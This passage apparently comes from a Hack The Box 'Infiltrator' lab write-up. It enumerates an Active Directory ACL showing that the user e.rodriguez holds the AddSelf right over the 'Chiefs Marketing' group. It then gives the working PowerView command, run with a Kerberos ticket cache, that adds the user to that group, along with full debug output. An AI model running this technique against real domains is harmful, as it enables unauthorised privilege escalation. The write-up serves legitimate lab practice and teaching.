AddSelf
During domain enumeration with BloodHound, it was identified that the e.rodriguez user has the AddSelf privilege over the chiefs marketing group
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=e.rodriguez@dc01.infiltrator.htb.ccache powerview INFILTRATOR.HTB/@dc01.infiltrator.htb -k --no-pass --dc-ip $IP -ns $IP -q 'Get-DomainObjectAcl "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" -ResolveGUIDs'
[...REDACTED...]
ObjectDN : CN=Chiefs Marketing,CN=Users,DC=infiltrator,DC=htb
ObjectSID : S-1-5-21-2606098828-3734741516-3625406802-1111
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : None
AccessMask : Self
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : Add/Remove self as member (bf9679c0-0de6-11d0-a285-00aa003049e2)
InheritanceType : None
SecurityIdentifier : E.rodriguez (S-1-5-21-2606098828-3734741516-3625406802-1109)
ObjectDN : CN=Chiefs Marketing,CN=Users,DC=infiltrator,DC=htb
ObjectSID : S-1-5-21-2606098828-3734741516-3625406802-1111
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE
ActiveDirectoryRights : Self
AccessMask : 0x8
InheritanceType : None
SecurityIdentifier : E.rodriguez (S-1-5-21-2606098828-3734741516-3625406802-1109)This can be confirmed with PowerView
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=e.rodriguez@dc01.infiltrator.htb.ccache powerview INFILTRATOR.HTB/@dc01.infiltrator.htb -k --no-pass --dc-ip $IP -ns $IP -q 'Add-DomainGroupMember -Identity "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" -Members e.rodriguez' -d
Logging directory is set to /home/kali/.powerview/logs/dc01.infiltrator.htb
[2024-09-01 19:08:17] LDAP sign and seal are supported
[2024-09-01 19:08:17] TLS channel binding is supported
[2024-09-01 19:08:17] Authentication: NTLM, User: INFILTRATOR.HTB\
[2024-09-01 19:08:17] Connecting to dc01.infiltrator.htb, Port: 636, SSL: True
[2024-09-01 19:08:17] Using Kerberos Cache: e.rodriguez@dc01.infiltrator.htb.ccache
[2024-09-01 19:08:17] SPN LDAP/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[2024-09-01 19:08:17] AnySPN is True, looking for another suitable SPN
[2024-09-01 19:08:17] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[2024-09-01 19:08:17] Using TGT from cache
[2024-09-01 19:08:17] Username retrieved from CCache: e.rodriguez
[2024-09-01 19:08:17] Trying to connect to KDC at 10.10.11.31:88
[2024-09-01 19:08:17] [Get-DomainObject] Using search base: DC=infiltrator,DC=htb
[2024-09-01 19:08:17] [Get-DomainObject] LDAP search filter: (&(|(samAccountName=E.rodriguez)(name=E.rodriguez)(displayname=E.rodriguez)(objectSid=E.rodriguez)(distinguishedName=E.rodriguez)(dnshostname=E.rodriguez)))
[2024-09-01 19:08:18] [Get-DomainGroup] Using search base: DC=infiltrator,DC=htb
[2024-09-01 19:08:18] [Get-DomainGroup] LDAP search filter: (&(objectCategory=group)(|(|(samAccountName=CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB)(name=CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB)(distinguishedName=CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB))))
[2024-09-01 19:08:18] [Get-DomainObject] Using search base: DC=infiltrator,DC=htb
[2024-09-01 19:08:18] [Get-DomainObject] LDAP search filter: (&(|(samAccountName=e.rodriguez)(name=e.rodriguez)(displayname=e.rodriguez)(objectSid=e.rodriguez)(distinguishedName=e.rodriguez)(dnshostname=e.rodriguez)))
[2024-09-01 19:08:18] User e.rodriguez successfully added to CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTBUsing the TGT of the e.rodriguez user, the user is now part of the chiefs marketing group